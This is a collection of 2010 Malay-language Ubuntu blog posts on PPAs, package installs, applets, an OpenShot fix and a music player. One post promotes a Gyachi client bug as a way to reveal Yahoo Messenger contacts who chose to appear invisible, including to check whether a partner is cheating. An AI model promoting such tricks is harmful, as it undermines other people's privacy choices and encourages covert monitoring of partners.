Kata arahan ini merupakan antara kata arahan yang biasa ada dalam blog ini. Ia berfungsi untuk memasang pakej atau perisian yang dinyatakan dengan syarat perisian atau pakej tersebut mestilah tersenarai dalam sumber perisian. Jika tidak, anda akan gagal memasangnya.

sudo apt-add-repository ppa:nama-ppa/subdirektori

Akhir-akhir ini pembaca semestinya selalu melihat kata arahan ini dalam blog melayubuntu. Ianya satu cara mudah untuk menambah PPA ke dalam ubuntu diperkenalkan sejak versi ubuntu karmic koala. Apa itu PPA? PPA ialah satu sumber perisian untuk ubuntu. Ia disediakan oleh sukarelawan ubuntu dan bukannya pembangun ubuntu. Selepas memasukkan PPA, anda perlu kemaskini sumber perisian dan barulah memasang perisian. Melakukannya menggunakan GUI memerlukan anda membuka Software Sources dan memerlukan pemahaman yang lebih sedikit tentang PPA.

sudo ppa-purge ppa:nama-ppa/subdirektori

Ini kata arahan yang baru saya perkenalkan hari ini. Ia berfungsi untuk membuang PPA yang telah anda masukkan. Untuk menggunakan kata arahan ini anda perlu muatturun pakej DEB berikut dan memasangnnya dalam ubuntu anda. Download ppa-purge. Untuk melakukan perkara yang sama secara GUI memerlukan anda menggunakan Software Sources.

killall nama-perisian

Akhir sekali, kata arahan ini akan membunuh (menghentikan) perisian yang sedang run dalam ubuntu anda. Ia diperlukan biasanya untuk force quit perisian yang tidak respon atau untuk restart perisian yang baru dikemaskini (seperti ketika pemasangan nautilus-elementary). Menggunakan GUI, anda perlu menambah applet force quit pada panel dan klik pada perisian yang ingin dihentikan. Satu cara lagi ialah menggunakan System Monitor.

Tahukah anda

Anda boleh masukkan 2 kata arahan sekaligus dan dihubungkan dengan &&.

Saturday, June 12, 2010

[Tutorial] Mengesan rakan YM yang Invisible menggunakan Gyachi

Berstatus Invisible merupakan sesuatu yang biasa bagi pengguna Yahoo Messenger (YM). Mereka memberikan alasan tidak mahu diganggu, ingin menjadi pemerhati bebas dan sebagainya namun apabila awek cun atau jejaka jambu online, cepat pula dia buzz dan memulakan sesi chatting - apakah??

Ironi bukan? Sekiranya anda ingin mengesan siapakah antara rakan anda yang sedang berada dalam status Invisible ini, hari ini saya ideakan satu cara yang cukup mudah iaitu menggunakan perisian Gyachi dalam sistem operasi ubuntu.

Gyachi merupakan jelmaan YM dalam linux yang menyokong kebanyakkan fungsi YM seperti Webcam, Audio Call, Chat Room, file transfer etc. Namun aplikasi ini mempunyai bug paling best iaitu ia tidak menyokong fungsi status invisible dalam YM menyebabkan pengguna boleh mengesan rakan mereka yang berstatus invisible! Apakah kebaikannya?

  • anda boleh mengetahui siapa antara rakan anda yang sedang invisible
  • bagus untuk mengesan kecurangan awek/balak korang
  • dan lain-lain lagi
Memasang Gyachi ke dalam ubuntu lucid

Saya menemui PPA berikut yang mengandungi package gyachi untuk ubuntu lucid;

sudo apt-add-repository ppa:baudm/ppa

sudo apt-get update
sudo apt-get install gyachi

(sekiranya keyserver ubuntu masih down, sila ke link berikut dan muatturun package deb yang diberikan : https://launchpad.net/~baudm/+archive/ppa/+build/1705504).

Hasilnya...


[Undi] Apa yang menghalang anda dari berubah kepada Ubuntu?

Jawapan anda akan memberi input kepada saya tentang apa yang patut difokus dalam blog ini. Kemudian, ia akan menyumbang kepada pembangunan ubuntu di Malaysia. Terima kasih atas kerjasama.




NOTA : Anda boleh memilih lebih dari satu jawapan.

Friday, June 11, 2010

Baiki masalah segmentation fault Openshot dalam ubuntu

--------------------------------
OpenShot (version 1.1.3)
--------------------------------
Process no longer exists: 3343. Creating new pid lock file.
A new frmMain has been created
Segmentation fault

Nota : Nombor yang di bold berbeza-beza.

Error ini akan diperolehi ketika pengguna melancarkan perisian video editor Openshot menggunakan terminal. Saya mengalaminya dan semua orang yang memasang gimp 2.7 dari ppa yang saya berikan sebelum ini juga mengalaminya. Ini adalah kerana ppa tersebut mengandungi package libcairo2 1.9.6-6~mrw4 yang mengantikan versi yang sepatutnya berada dalam lucid iaitu versi 1.8.10-2ubuntu1.


Apabila anda Force Version libcairo2 menggunakan Synaptic Package Manager kepada versi asal iaitu 1.8.10-2ubuntu1, anda akan boleh melancarkan dan menggunakan Openshot tanpa apa-apa masalah lagi. Caranya, buka Synaptic Package Manager dan search libcairo2 - Pilih menu Package - Force Version, kemudian pilih versi 1.8.10-2ubuntu1.

Hasilnya,



Beberapa kemaskini : Gloobus Preview + Elementary Theme


Hari ini, gloobus preview dan elementary theme menerima kemaskini sekiranya anda memasangnya melalui PPA seperti yang saya tulis sebelum ini.

Globus preview merupakan aplikasi yang memudahkan pengguna preview fail-fail dalam ubuntu tanpa perlu membuka apa-apa aplikasi ketiga. Hari ini, Gloobus preview mampu memasang font yang sedang anda preview. Fungsi lainnya ialah, gloobus preview mampu preview dalam mood slideshow dan juga set image sebagai wallpaper. Sedikit masa lagi, gloobus preview mungkin akan mendapat fungsi cover flow!

Elementary theme pula menerima update yang memperlihatkan beberapa perubahan seperti minimalist scrollbar dan perubahan dari segi kepantasan. Ada boleh memasang theme ini melalui cara berikut dan ianya akan dikemaskini dari masa ke semasa (berbeza dari theme yang dimuatturun dari gnome-look).
sudo apt-add-repository ppa:elementaryart/ppa
sudo apt-get update
sudo apt-get install elementary-theme gtk2-engines-equinox elementary-icon-theme elementary-wallpapers

Thursday, June 10, 2010

Download Font Ubuntu [Akhirnya!]


Setelah menunggu lama untuk menggunakannya, kini pengguna ubuntu boleh memuatturun dan memasang font yang digunakan dalam logo ubuntu terbaru dan font ini diberi nama ubuntu. Namun harus diingat, font ini masih belum siap sepenuhnya. Terima kasih kepada OMG Ubuntu! kerana berkongsi font ini. Sila ke link berikut untuk memuatturun font ini;
http://www.omgubuntu.co.uk/2010/06/new-ubuntu-font-how-to-download-it-but.html

Wednesday, June 09, 2010

Fasa Ke2 Perkembangan Ubuntu : Adakah Kita Perlukan Buku Panduan Ubuntu?


Setakat yang saya tahu, masih belum terdapat sebuah buku (bukan ebook) panduan ubuntu yang dihasilkan sendiri oleh komuniti ubuntu malaysia (sila beritahu saya jika sudah ada). Lalu, saya ingin bertanya, jika sekiranya terdapat sebuah buku panduan ubuntu dalam bahasa malaysia, adakah anda akan mendapatkannya? Dan adakah pengguna ubuntu betul-betul perlukan sebuah buku panduan? Adakah blog sahaja sudah mencukupi? Apakah agaknya anjakkan yang bakal berlaku sekiranya komuniti mempunyai sebuah buku panduan ubuntu?

Sebenarnya berbagai persoalan muncul dalam fikiran saya. Bukan senang untuk memenuhi kehendak semua orang dalam semua masa. Paling penting ialah kita perlu lakukan yang terbaik dalam semua masa. Lalu idea menghasilkan buku panduan ubuntu muncul dalam fikiran saya. Namun saya tidak akan membuat keputusan itu berseorangan. Banyak perkara perlu diambil kira dan untuk itu banyak masa perlu digunakan. Akibatnya, blog ini mungkin akan jarang dikemaskini oleh saya.

Jadi, apa pilihan yang saya ada? Perlukah anjakkan ini atau kekalkan apa yang sudah ada? Pandangan bernas pembaca diperlukan. Terima kasih.

Tuesday, June 08, 2010

Jadi kartunis dalam masa 5 minit dengan TBO dalam Ubuntu Lucid Lynx


Saya tidak ada bakat dalam melukis kartun. Kebanyakkan pembaca entry ini juga pastinya berkongsi ketidakpandaian yang sama dengan saya. Tetapi kalau saya kata anda boleh hasilkan komik simple dalam masa 5 minit dari sekarang, apa kata anda?

Saya ingin perkenalkan satu perisian dipanggil TBO. Perisian ini memudahkan segala kerja dalam penghasilan komik simple ala-ala senyum kambing dalam akhbar utusan malaysia. Anda tidak perlu melukis, mewarna, kerana semua karakter, bentuk mata, mulut, bubble, dan sebagainya telah tersedia. Apa yang perlu dilakukan ialah drag and drop item tersebut ke dalam canvas dan mulakan editasi!

Pemasangan TBO ke dalam ubuntu
Buka terminal dan copypaste command berikut;
sudo add-apt-repository 'deb http://sugus.eii.us.es/debrepo sugus main'
sudo apt-get update
sudo apt-get install tbo
Selepas pemasangan, ia sepatutnya berada dalam menu grafik!

Dibawah merupakan interface perisian ini;


Amacam? Ada berani nak jadi kartunis? Jom hasilkan komik tentang ubuntu jom! =)

Kombinasi applet terbaik : Cardapio + Window Buttons + Global Menu

Jom bercakap berkenaan segala kesempatan untuk  memaksimakan ruang vertikal skrin komputer samada laptop mahupun desktop. AbiDarwish pada mulanya menunjukkan satu mockup penggunaan satu panel applet iaitu Window Buttons dalam laman facebook komuniti melayubuntu. Saya pernah membaca tentang applet ini namun tidak berkesempatan mencubanya.

Hari ini setelah mengesahkan fungsinya dengan AbiDarwish, saya mencubanya pertama kali dan tidak sekadar itu, saya gabungkan sekali bersama Cardapio dan Global Menu menjadikan ianya lebih lebih menarik dan berbeza dari mana-mana sistem operasi masa kini.


Memasang dalam Ubuntu
Muatturun fail DEB disini dan pasang ke dalam ubuntu anda. Selepas siap dipasang, klik pada panel - dan Add to panel applet Window Buttons ditempat yang anda kehendaki. Right click pada applet tersebut, pilih preferences pilih tab Behavior dan check Hide compiz decorations for maximized windows.

Kekurangan
Applet ini hanya berfungsi apabila terdapat aplikasi yang dimaximize. Sekiranya tidak ada aplikasi yg maximize maka ia akan meninggalkan ruang kosong pada panel ditempat applet ini berada. Mungkin hal ini akan disedari oleh developer dan dapat diperbaiki sedikit masa lagi.

Memasang Tema
Menggunakan Preferences juga, pengguna boleh memasang tema yang sepadan dengan tema desktop yang sedang digunakan. Contohnya jika anda menggunakan tema desktop ubuntu default iaitu ambience, sila gunakan tema ini : http://gnome-look.org/content/show.php/Ambiance+Window+Buttons+Theme?content=124593

Monday, June 07, 2010

Aplikasi Piala Dunia Afrika Selatan 2010 dalam Ubuntu Lucid (Juga untuk Windows & Mac OSX)

Pasukan negara manakah pilihan anda dalam piala dunia kali ini yer? Brazil? Argentina? Spain? atau juga England? Tidak dapat dinafikan, piala dunia menjanjikan satu hiburan istimewa setiap kali, dan dimana sahaja ia dianjurkan bukan sehaja kepada kaki bola tetapi juga kepada kaum-kaum yang biasanya agak kureng meminati sukan tersebut.

Aktiviti klasik yang selalu diamalkan ketika menjelangnya kejohanan piala dunia ialah mengumpulkan keratan akhbar dalam bentuk poster (atau dalam majalan sukan) yang memaparkan satu jadual penuh perlawanan-perlawanan bola sepak berserta jaringan gol yang perlu diisi dalam petak kosong. Kemudian kaki bola akan mengira secara manual berapa bilangan mata kemudian membuat jangkaan tentang jadual peringkat seterusnya. Ahaks! Klasik!

Di tahun 2010, anda tidak perlu lagi melakukan perkara yang sama. Ini kerana teknologi telah memudahkannya untuk anda beralih ke dunia paperless. Saksikan Aplikasi Piala Dunia 2010 dalam desktop Ubuntu Lucid Lynx saya;


Pemasangan Aplikasi Piala Dunia Dalam Ubuntu

1.Pergi ke http://www.e-link.it/southafrica2010/ kemudian muatturun versi linux dalam bentuk .ZIP

2.Unizp ke suatu tempat. Buka folder berkenaan dan anda akan mendapati terdapat satu fail South Africa 2010 1.1. Buatkan fail itu menjadi executable (right click - properties - permissions - allow executing file as program).

3.Double click file tersebut dan anda telah sedia.

Untuk pengetahuan anda, aplikasi yang sama juga boleh digunakan dalam Mac OSX dan Windows.

Paling best kerana anda boleh mengubah timezone supaya ia selari dengan masa di tempat anda berada. Amacam? Sekiranya anda sukakan entry ini, sila share kepada rakan-rakan anda juga. Terima kasih.

Cardapio dan Global Menu untuk Ubuntu Lucid


Semalam saya memasang global menu, iaitu satu applet yang meletakkan menu program pada panel untuk menambahkan lagi ruang vertikal pada skrin. Namun saya dapati global menu tidak begitu ngam dengan applet menu default ubuntu mahupun gnome main menu yang seterusnya mendorong saya mencari altenatif lain. Disitu saya bertemu Cardapio, yang telah direview oleh blog Omgubuntu!

Seperti yang dapat anda lihat diatas, cardapio sangat sesuai digunakan jika sekiranya anda menggunakan global menu dalam ubuntu. Cardapio ini pula sedikit mirip dengan menu dalam windows tetapi perisian masih dikategorikan mengikut fungsi dan bukan syarikat pengeluar sepertimana dalam windows.


Pemasangan Cardapio

Untuk memasang cardapio dalam ubuntu, sila ikuti langkah berikut;
1.Buka terminal dan copypaste command berikut;
sudo add-apt-repository ppa:tvst-hotmail/cardapio
sudo apt-get update
sudo apt-get install python-keybinder cardapio
Selesai proses diatas, klik pada panel dan pilih add to panel dan add cardapio. Right click pada applet tersebut untuk mengubah kedudukan dan sebagainya.

Sunday, June 06, 2010

Fungsi Last.fm di Ubuntu Guna Clementine

Last.fm merupakan satu platform sosial, membolehkan anda berkongsi dengan rakan – rakan akan lagu kegemaran anda. Kongsi maksudnya disini ialah kongsi anda suka lagu apa, berapa banyak anda dah dengar lagu sesuatu lagu, dan sebagainya. Ia turut akan mencadangkan lagu – lagu yang berkaitan. Sebagai contohnya, aku dengan lagu Metallica, so Last.fm akan cadangkan juga dengar lagu Megadeth. Kalau anda dengar lagu KRU, dicadangkan juga dengar lagu Indigo. Jika anda dah bosan dengar lagu yang ada dalam koleksi, anda boleh dengar pelbagai channel radio yang terdapat dalam Last.fm.

Okay, cukup introduction. Aplikasi audio yang paling saya suka di Ubuntu ialah Clementine. Pada mulanya saya suka guna Rhythm Box, pastu ke Banshe, then tukar ke Amarok (tak pakai sebab output error), then paling last Clementine. Sebab guna clementine adalah kerana integrasi antara Clementine dan Last.fm sangat memuaskan. Selain streaming lagu kegemaran di profile last.fm saya dengan mudah, ia juga ada satu button "Favorite" song. Tidak seperti di audio player yang lain.

Semua lagu yang anda dengar di Clementine akan muncul di profail last.fm anda...seperti screenshot di bawah.

xx


Berikut pula screenshot untuk clementine.



Perhatikan, No 1 adalah button untuk favorite track, manakala no 2 adalah lagu anda sedang di "stream" ke profile anda. Semua lagu ini akan muncul di profile anda seperti screenshot di atas.


So, marilah kita sertai Last.fm dan guna audio player clementine...hehe...BTW, last.fm ada juga di windows dan mac.


Profile last.fm saya
Download Clementine

Sekian.

damhamaza
Penulis sambilan di Melayubuntu.

Quartz OS: Material Design + Linux = Awesome

Konsep Material Design pertama kali diperkenalkan oleh Google untuk Android 5.0 Lollipop. Nampaknya, ada developer yang berminat untuk ...